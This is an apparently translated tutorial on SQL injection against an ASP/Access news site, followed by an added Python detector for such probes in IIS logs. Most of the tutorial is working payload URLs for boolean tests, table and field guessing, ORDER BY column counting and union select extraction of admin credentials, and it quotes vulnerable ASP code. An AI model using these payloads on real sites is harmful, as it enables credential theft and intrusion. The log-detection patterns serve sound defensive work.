With the emergence of new Internet products such as social networks and microblogs, Web-based Internet applications have become more and more widespread, and enterprise information platforms, for example most corporate websites, employee OA systems and email systems, are deployed on Web platforms. The rapid development of the Web has also attracted strong attention from hackers, making Web security threats prominent. Hackers exploit vulnerabilities in Web programs, for example obtaining control of the Web server by means of SQL injection, file upload and cross-site attacks, and then tamper with webpage content and steal important internal data. This article explains common SQL injection attacks in detail.
SQL injection is mostly carried out through an ordinary Web browser or other hacking tools. On the surface it does not look any different from normal browsing: the process looks as if you typed the website address, added a few characters and pressed Enter, but by then the damage may already have been done.
To put it simply, SQL injection is a vulnerability in which an application passes a Structured Query Language (SQL) query to the back-end database; if attackers are able to influence that query, SQL injection is triggered. By influencing the content passed to the database, attackers can modify the syntax and functions of the SQL, and affect the functions and flexibility of the database and of the operating system supporting it. SQL injection is not just a vulnerability that affects Web applications: any code that obtains input from an untrusted source and uses that input to construct a dynamic SQL statement is likely to be attackable.
Currently, there are five common types of injection on the Internet, divided by database type:
A. Access Injection
B. Mssql Injection
C. Mysql Injection
D. Oracle Injection
E. Sybase Injection
F. Other database Injection
Next, let's explain how ASP injection attacks work.
Access injection overview
ASP injection is also complicated. To put it simply, ASP can be combined with an Access database, in which case an injection point has no permission level; but ASP can also be combined with an MSSQL database, in which case injection points fall into three permission levels:
1. Public
2. Db_owner
3. SA
These three permission levels are briefly described as follows. The public permission is the smallest: at such injection points you can enumerate tables and fields to obtain the administrator account and password. The db_owner permission is larger than public: after obtaining the absolute path of the website, backup can be used to obtain a Webshell on the target website (with the permissions of the website). The sa permission is the largest; its full name is System Admin, and simply put this permission is equivalent to an administrator in Windows. It can be seen how dangerous such injection is.
Access Injection
Web application languages provide programmable methods to interact with databases, such as data queries. If the Web developer does not ensure that user input parameters and received values are properly processed before they are passed to the database for querying, injection usually occurs: if an attacker can control the statement sent to the database, the database will parse the data as code when it executes the query, and the attacker will be able to obtain the data he wants from the database query.
Determining whether Access can be injected
Before learning injection, configure the IE browser as follows.
Tools → Internet Options → Advanced → Show friendly HTTP error messages
Remove the check mark before "Show friendly HTTP error messages" and confirm. That completes the first step. If you do not clear this check box, any website error is shown only as an HTTP 500 error and no more detailed information can be obtained from the webpage. The specific operations are shown in Figure 1 and Figure 2.
Figure 1
Figure 2
After the configuration is complete, open the local ASP Web application environment to test for the injection vulnerability.
Example 1: http://192.168.205.128/news.asp?id=50'. We add a single quotation mark after the address, and the server returns the following error message, as shown in Figure 3:
Microsoft JET Database Engine error '80040e14'
Syntax error (missing operator) in query expression 'id = 50''.
/news.asp, line 84
Figure 3
The error message reveals several important pieces of information:
1. The website uses an Access database, connected through the JET engine.
2. The table queried by this SQL statement has a field named id.
3. The program did not check whether the user input is legal.
4. The injection is a numeric injection.
Therefore the principle of SQL injection is simply to submit special code from the client in order to collect information about the program, the database and the server.
Of course, the single quote is not a good way to test whether a URL is an injection point. The IIS on each server returns specific error messages to the client; if the program validates the parameter, the SQL injection will not succeed, but the server may still report an error, with the prompt "An error occurred while processing the URL. Contact the system administrator", as shown in Figure 4.
Figure 4
Second, some programmers with a little knowledge of SQL injection think it is safe to filter out single quotes, and this is not a rare case. If you test with single quotes, such injection points cannot be found. So what test method is more accurate? The answer is as follows:
1. http://192.168.205.128/news.asp?id=50
2. http://192.168.205.128/news.asp?id=50 and 1=1
3. http://192.168.205.128/news.asp?id=50 and 1=2
In the first case, the SQL statement executed becomes SELECT * FROM table WHERE id = 50
The following is an example:
This is the data.mdb table of a database, as shown in Figure 5:
Open one of the tables. For example, id, gmadmin and gmpass displayed along the top are called fields, and each field has corresponding data beneath it.
Figure 5
Therefore this statement is easy to understand:
SELECT * FROM table WHERE id = 50
It finds the row in the table whose id field is 50 and returns its values.
Let's take a look at the test injection situation:
SELECT * FROM news WHERE id = 50 and 1 = 1: the condition is true, because 1 does equal 1
SELECT * FROM news WHERE id = 50 and 1 = 2: the condition is false, because 1 is not equal to 2
Let's test how the web page behaves with these two statements. First, look at the original page without any extra parameters, as shown in Figure 6.
http://192.168.205.128/news.asp?id=50
Figure 6
Use the first test statement: http://192.168.205.128/news.asp?id=50 and 1=1
We know that 1 = 1 is true. Therefore, after this statement is added, the normal original page should still be returned, as shown in Figure 7.
Figure 7
Use the second test statement: http://192.168.205.128/news.asp?id=50 and 1=2
We know that 1 is not equal to 2, so when we open this link the database query returns data different from the original query, and the page changes, as shown in Figure 8.
Figure 8
This is how we determine whether the injection vulnerability exists.
Access Injection
Once you can determine that a URL is an injection point, you can do more and obtain the desired data based on it. How do we get the data? Now we move on to more advanced methods.
1. Determine which database the current Web application uses, starting with the difference between Access and MSSQL. Both Access and MSSQL have their own system tables, such as tables that store all objects in the database. Access stores these in the system table [msysobjects], but when that table is read in the Web environment the system reports "no permission". MSSQL stores them in the table [sysobjects], which can be read normally in the Web environment.
Run this statement, as shown in Figure 9.
http://192.168.205.128/news.asp?id=50%20and%20(select%20count(*)%20from%20msysobjects)>0
Figure 9
2. After confirming that the database is Access, you must start guessing the database content. The first thing you want is the administrator account and password. Before that, understand that the account and password must be stored in fields of some table, so the first thing to do is to guess which table stores them. At this stage the account and password fields are represented by * (asterisk). Then, following the test injection statements above, if the guess is correct the URL displays the normal content, otherwise the system reports an error.
Run this statement. The expected result is shown in Figure 10.
http://192.168.205.128/news.asp?id=50%20and%20exists%20(select%20count(*)%20from%20gmadmin)
Figure 10
The displayed result is: Microsoft JET Database Engine error '80040e37' The Microsoft Jet database engine cannot find the input table or query 'admin'. Make sure it exists and that its name is spelled correctly. /news.asp, line 84
Since the admin table cannot be found, the database does not have this table. Change the table name and guess again. The expected result is shown in Figure 11.
http://192.168.205.128/news.asp?id=50%20and%20exists%20(select%20count(*)%20from%20gmadmin)
Figure 11
After execution, no error is displayed and the page is the same as when browsed normally, indicating that the gmadmin table exists in the database.
3. After guessing the table, continue guessing the fields in the table, where the account and password are stored. First guess that the account and password fields are username and password.
The statements should be as follows:
and (select count(username) from gmadmin)>0
and (select count(password) from gmadmin)>0
In practice, execute the following two statements; the results are shown in Figure 12 and Figure 13 respectively.
http://192.168.205.128/news.asp?id=50%20and%20(select%20count(username)%20from%20gmadmin)>0
http://192.168.205.128/news.asp?id=50%20and%20(select%20count(password)%20from%20gmadmin)>0
Figure 12
Figure 13
After execution, the original normal page is not returned, so the fields may not be username and password. Next, try gmadmin and gmpass as the account and password fields.
Run the following statements. The results are shown in Figure 14 and Figure 15 respectively.
http://192.168.205.128/news.asp?id=50%20and%20(select%20count(gmadmin)%20from%20gmadmin)>0
http://192.168.205.128/news.asp?id=50%20and%20(select%20count(gmpass)%20from%20gmadmin)>0
Figure 14
Figure 15
This time both statements return the normal page, indicating that the fields have been guessed correctly.
4. With the table and the fields known, only one step remains before the final data can be obtained. When we request http://192.168.205.128/news.asp?id=50, news.asp is executed. Let's look at its source code first.
<%
' news.asp as shown in the article: the id parameter is concatenated straight
' into the SQL text. Replace() only doubles single quotes, which does nothing
' for a numeric comparison, so "50 and 1=2" is still executed as SQL.
Dim rs2
Dim rs2_numRows
Set rs2 = Server.CreateObject("ADODB.Recordset")
rs2.ActiveConnection = MM_conn1_STRING
rs2.Source = "SELECT * FROM news WHERE id = " + Replace(rs2__MMColParam, "'", "''")
rs2.CursorType = 0
rs2.CursorLocation = 2
rs2.LockType = 1
rs2.Open()
rs2_numRows = 0
%>
In the middle part, SELECT * FROM news WHERE id = is written: the request http://192.168.205.128/news.asp?id=50 queries the news table. Therefore we must first find out how many fields the news table has.
Execute the following statement:
http://192.168.205.128/news.asp?id=50%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12%20from%20gmadmin
Why do we write all the numbers from 1 to 12? This is a step-by-step test. At the beginning we use http://192.168.205.128/news.asp?id=50 and 1=2 union select 1 from gmadmin. After opening this page we find that it is not the normal page, so we continue the test with the statements below; the page is still an error page, as shown in Figure 16.
and 1=2 union select 1,2 from gmadmin
and 1=2 union select 1,2,3 from gmadmin
and 1=2 union select 1,2,3,4 from gmadmin
Figure 16
And so on. When 12 is reached, the page finally displays normally, as shown in Figure 17.
Figure 17
Now that the correct number of fields is known, the account and password content can be extracted.
At this point the page (Figure 17) shows numbers such as 2, 3, 12 and 4. These numbers mark the positions where data content will appear.
Run the following statement. The expected result is shown in Figure 18. http://192.168.205.128/news.asp?id=50%20and%201=2%20union%20select%201,2,gmadmin,gmpass,5,6,7,8,9,10,11,12%20from%20gmadmin
Figure 18
Then the final data content is obtained. However, you may think that guessing step by step like this:
and 1=2 union select 1,2 from gmadmin
and 1=2 union select 1,2,3 from gmadmin
and 1=2 union select 1,2,3,4 from gmadmin
is very slow and laborious, so a better approach is needed. See the following tips.
Access Injection
There are many tricks available for ASP injection. Here we discuss only the problems encountered in this article.
Tip 1:
When determining the number of fields, you can use ORDER BY directly at the start to probe.
After executing the following statement, the page opens normally, as shown in Figure 19.
http://192.168.205.128/news.asp?id=50 order by 10
Figure 19
Continue with http://192.168.205.128/news.asp?id=50 order by 13, as shown in Figure 20.
Figure 20
The page returns an error, so the number of fields must be less than 13; otherwise the page would not error.
Continue the test with http://www.bkjia.com/news.asp?id=50 order by 12; the result is shown in Figure 21.
Figure 21
The page displays normally, so the correct statement is http://192.168.205.128/news.asp?id=50 order by 12, and the number of fields is 12.
Tip 2:
After determining the number of fields, you no longer need the count statements above to test the fields; you can put the guessed field names directly into the union select statement, as shown in Figure 22.
Figure 22
If the guess is wrong, keep changing the field name until the correct one is found.
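Added example (not part of the original article): a small detector that recognises, in IIS W3C log lines, the probing requests this article walks through (the and 1=1 / and 1=2 test, the exists(select count(*) ...) table guess, the msysobjects check, union select and order by column counting) and flags clients that run several of them in sequence. The log lines are constructed sample data in the default W3C field order, not a real log.

```python
"""Flag the SQL injection probe requests described in the article in IIS logs."""
import re
from urllib.parse import unquote_plus

# Patterns taken from the probes shown in the article; matched case-insensitively.
PROBES = {
    "boolean_test": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "table_guess": re.compile(r"exists\s*\(\s*select\s+count", re.I),
    "column_count": re.compile(r"union\s+select\b|order\s+by\s+\d+", re.I),
    "sys_table": re.compile(r"\b(msysobjects|sysobjects)\b", re.I),
}

# Constructed sample: date time s-ip method uri-stem query port user c-ip agent status
SAMPLE_LOG = """\
2024-01-01 10:00:01 192.168.205.128 GET /news.asp id=50 80 - 10.0.0.5 Mozilla 200
2024-01-01 10:00:02 192.168.205.128 GET /news.asp id=50%20and%201=1 80 - 10.0.0.5 Mozilla 200
2024-01-01 10:00:04 192.168.205.128 GET /news.asp id=50%20and%20exists%20(select%20count(*)%20from%20gmadmin) 80 - 10.0.0.5 Mozilla 500
2024-01-01 10:00:05 192.168.205.128 GET /news.asp id=50%20order%20by%2012 80 - 10.0.0.5 Mozilla 200
2024-01-01 10:00:06 192.168.205.128 GET /news.asp id=50%20and%201=2%20union%20select%201,2,3%20from%20gmadmin 80 - 10.0.0.5 Mozilla 500
2024-01-01 10:00:07 192.168.205.128 GET /about.asp - 80 - 10.0.0.9 Mozilla 200
"""


def classify(query):
    """Decode the query string and return the names of every probe it matches."""
    decoded = unquote_plus(query)
    return [name for name, rx in PROBES.items() if rx.search(decoded)]


def scan(log_text):
    """Return (client_ip, uri_stem, query, probe_names) for each suspicious line."""
    hits = []
    for line in log_text.splitlines():
        f = line.split()
        if len(f) < 11 or f[5] == "-":  # malformed line or no query string
            continue
        names = classify(f[5])
        if names:
            hits.append((f[8], f[4], f[5], names))
    return hits


def suspicious_clients(log_text, threshold=3):
    """Client IPs with at least `threshold` probe hits: a single 'and 1=1' may be
    noise, but a run of boolean, count and union probes is enumeration."""
    counts = {}
    for ip, *_ in scan(log_text):
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)
```

Because the probes are URL-encoded in the log, decoding before matching is what makes the patterns fire; the 500 status on the table-guess and union lines is the same error-page behaviour the article relies on, and is a useful second signal.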